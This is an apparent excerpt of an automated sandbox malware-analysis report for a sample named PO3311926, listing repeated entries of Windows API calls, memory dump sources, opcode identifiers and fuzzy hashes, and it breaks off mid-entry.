                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00BA12E1
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00BA12E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: 5adab7c101d6102fe0d46e1731a5094d50304ae2d28a02202d3c80bb9b7430b8
                                                                                              • Instruction ID: b7ea7a186d07c3bac22694796feaf36d0698dfbc095baaf68b0aaf3785009996
                                                                                              • Opcode Fuzzy Hash: 5adab7c101d6102fe0d46e1731a5094d50304ae2d28a02202d3c80bb9b7430b8
                                                                                              • Instruction Fuzzy Hash: A2C04C7640C280FFCB015BA09C0CE2FBFADAB9D311F05C809B1A580120C735C510DB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 7368eb03ce4dbc9940f1c74c25c4cb3af7743a5e68232d72557cc8a7130d1658
                                                                                              • Instruction ID: 629d85d001a2aba27df3a68589f56c32d426e59ca8a7ed13a7e9d1f0174fbaca
                                                                                              • Opcode Fuzzy Hash: 7368eb03ce4dbc9940f1c74c25c4cb3af7743a5e68232d72557cc8a7130d1658
                                                                                              • Instruction Fuzzy Hash: 09C19E70A08254AFEF55CF6CC494BA97BE5EF1A310F0809FAEC559F292DB309944CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: d401fe0a4608fce027e6c649f26fceb8b3495163bc6132197e502813d8fa5ec8
                                                                                              • Instruction ID: 17c99a12c87ce855eab5c54711ecb7882c55215c0b1cdfc88c2a584c8f7f1009
                                                                                              • Opcode Fuzzy Hash: d401fe0a4608fce027e6c649f26fceb8b3495163bc6132197e502813d8fa5ec8
                                                                                              • Instruction Fuzzy Hash: 2371C271508B849EDB35DB74CC919E7B7E9EF16700F4009AEF1AB87241EA326684DF21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA8289
                                                                                                • Part of subcall function 00BA13DC: __EH_prolog.LIBCMT ref: 00BA13E1
                                                                                                • Part of subcall function 00BAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: 2f8c56d73abd57a66eb212a0fae029164f81e5d15815292cc6c905a27c663fc3
                                                                                              • Instruction ID: d5f46ce1a9ad6583a8a59467e8a6a85f29f1da25f3c73cee2ebb2a93453a2a2b
                                                                                              • Opcode Fuzzy Hash: 2f8c56d73abd57a66eb212a0fae029164f81e5d15815292cc6c905a27c663fc3
                                                                                              • Instruction Fuzzy Hash: 7141A4719486589ADF20DB60CC55AEAB7F8EF06304F4404EBE08A97593EF755EC8CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA13E1
                                                                                                • Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C
                                                                                                • Part of subcall function 00BACE40: __EH_prolog.LIBCMT ref: 00BACE45
                                                                                                • Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: cc5d02d070214824bd712ab7790d6f4faed244fe7bc3b01cc07455ab50604073
                                                                                              • Instruction ID: a205e60c25790c5248e28b03593b45ca4ed193a45c1301f472758f5cfc42aff7
                                                                                              • Opcode Fuzzy Hash: cc5d02d070214824bd712ab7790d6f4faed244fe7bc3b01cc07455ab50604073
                                                                                              • Instruction Fuzzy Hash: D6415AB0909B409EE724CF3D8885AE6FBE5BF29300F50496ED5FE83282CB716654CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA13E1
                                                                                                • Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C
                                                                                                • Part of subcall function 00BACE40: __EH_prolog.LIBCMT ref: 00BACE45
                                                                                                • Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 7ef78132cd5787fab9996f5b82abde86bd3a19e72a4027f05778b0492b1c8c10
                                                                                              • Instruction ID: 22f4f4b390f298f32cff9d3b7abe2228282ad367b899a2b849e1d649c4be895c
                                                                                              • Opcode Fuzzy Hash: 7ef78132cd5787fab9996f5b82abde86bd3a19e72a4027f05778b0492b1c8c10
                                                                                              • Instruction Fuzzy Hash: 884158B0905B409EE724DF798885AE6FBE5FF29300F54496ED5FE83282CB726654CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 29d1f63217dbc9316492adc6414ba72e609c2509fc21ef1c3928ac8894253b78
                                                                                              • Instruction ID: 20fbe151585af3869b8579d5cbe40a421998138013bd28ff2f48e441fb64677e
                                                                                              • Opcode Fuzzy Hash: 29d1f63217dbc9316492adc6414ba72e609c2509fc21ef1c3928ac8894253b78
                                                                                              • Instruction Fuzzy Hash: 1021E6B1E40211ABDB149F74CC416FA77E8FB18714F1401BAA516EA681D3F0DA00C7A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BBB098
                                                                                                • Part of subcall function 00BA13DC: __EH_prolog.LIBCMT ref: 00BA13E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2ce4ed44be9da57607f250bd2711a867d59f188a94ced19461f78c881dda8682
                                                                                              • Instruction ID: 3131c52ca0d733dda6cd854db42089c0afa781cdab96d112ef33fd29ff26ceca
                                                                                              • Opcode Fuzzy Hash: 2ce4ed44be9da57607f250bd2711a867d59f188a94ced19461f78c881dda8682
                                                                                              • Instruction Fuzzy Hash: B8315871814249ABCB15DFA8C891AFEBBF4AF09304F1048DEE409B7242D7B5AE048B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BCACF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 58cdde6bb3ecc64d457460f9b30ec5c179a532ccf056e21c5fefb0cb3fd47741
                                                                                              • Instruction ID: 4b48fdae11595a46b758902aac36ca7325cbaf2adb494ef07a62dadf8138c080
                                                                                              • Opcode Fuzzy Hash: 58cdde6bb3ecc64d457460f9b30ec5c179a532ccf056e21c5fefb0cb3fd47741
                                                                                              • Instruction Fuzzy Hash: 22110A33A0162D6F9B219E18DC50F5BB3D5EB8432971642A5FD26EB254EB30DC0187D2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BACE45
                                                                                                • Part of subcall function 00BA5E37: __EH_prolog.LIBCMT ref: 00BA5E3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 7a59b356bf623dfd26d024ca4ff0da4da207943cc1dd68ccd18f4a036fc61aaa
                                                                                              • Instruction ID: 487ddd5e51792fbaa5fbf6da03ac4def0d8ffac720c283cf678029798bb85708
                                                                                              • Opcode Fuzzy Hash: 7a59b356bf623dfd26d024ca4ff0da4da207943cc1dd68ccd18f4a036fc61aaa
                                                                                              • Instruction Fuzzy Hash: 33118671A09244DEEB25DB79C5457EEBBE8DF45300F10449EE446D3282DBB89F04C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 16c223ca42c389179cc9f5a151989fbbc87e6eef19a6da311592d80b623b6177
                                                                                              • Instruction ID: 03b6f6e63fd44ed06b2151e92b21756b4e4ed9f69d4417c211d955bf2b40b80b
                                                                                              • Opcode Fuzzy Hash: 16c223ca42c389179cc9f5a151989fbbc87e6eef19a6da311592d80b623b6177
                                                                                              • Instruction Fuzzy Hash: D701A533D04528ABCF12ABA8CC81ADEB7F1EF8A750F0145A5F812B7212DA34CD04D6A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BCB177
                                                                                              • _free.LIBCMT ref: 00BCC4E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction ID: bfeb0fc328f59235fd31524a500bad0dd69e061c5c9c93f5bb50f966c0527c8c
                                                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction Fuzzy Hash: C90126726003056BE3358E699881E6AFBECEB95330F25056DE19893281EB30A905C724
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BCB177
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 9206d85d8342b1daba7545f00b862635f6dd7ee7c9a8996f1501d4791a2aaa97
                                                                                              • Instruction ID: d10b579038144ea35ff46d84b827159ea8ea66ccae6aea06387c56fd8ec0c31b
                                                                                              • Opcode Fuzzy Hash: 9206d85d8342b1daba7545f00b862635f6dd7ee7c9a8996f1501d4791a2aaa97
                                                                                              • Instruction Fuzzy Hash: 18F0B43262512477DB255A21AC2BF9F77C8EF41760F1D81DDB808B7190CF31D90186E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BC3C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 90c52bdfdba522c8f919ecbc21ec18ed1ea6a6610682aa46bc9c249ebb661062
                                                                                              • Instruction ID: 4cfc6d1b1715f41f5bea9fc4de46ce542861f332f1cab708efecf4a1be85aa56
                                                                                              • Opcode Fuzzy Hash: 90c52bdfdba522c8f919ecbc21ec18ed1ea6a6610682aa46bc9c249ebb661062
                                                                                              • Instruction Fuzzy Hash: BCF08C3620031A9FCF128EA8EC14F9F77E9EB01F207548169FA15E7190EB31DA20D7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 2186f76d19f01313a91b8ee4e3b2d4286f48ce90cdbd346c8776365bdfa1e016
                                                                                              • Instruction ID: 357a680f628263051d88edaa869c671298c6fe1b551a788a55c72db6ff1a19f6
                                                                                              • Opcode Fuzzy Hash: 2186f76d19f01313a91b8ee4e3b2d4286f48ce90cdbd346c8776365bdfa1e016
                                                                                              • Instruction Fuzzy Hash: 54E06D3160622767EB7226A59C09F9F76C8DF817A4F1501E9BC18AB092DF21CC0186E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA5AC2
                                                                                                • Part of subcall function 00BAB505: __EH_prolog.LIBCMT ref: 00BAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 9ce9c541a568a2f583813ba9c6d1543de699fc0b5c4fa552f5be15a877f1260a
                                                                                              • Instruction ID: cf928897c17cdd3e5f0eaf9edde89dfdb94277303a2c1fefb31cf276c6eb655b
                                                                                              • Opcode Fuzzy Hash: 9ce9c541a568a2f583813ba9c6d1543de699fc0b5c4fa552f5be15a877f1260a
                                                                                              • Instruction Fuzzy Hash: 97016930924690DAD729F7A8C0517FEFBF49F64304F5084CEA46663282CBB41B08D6A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00BA95D6,?,?,?,?,?,00BD2641,000000FF), ref: 00BA963B
                                                                                              Memory Dump Source
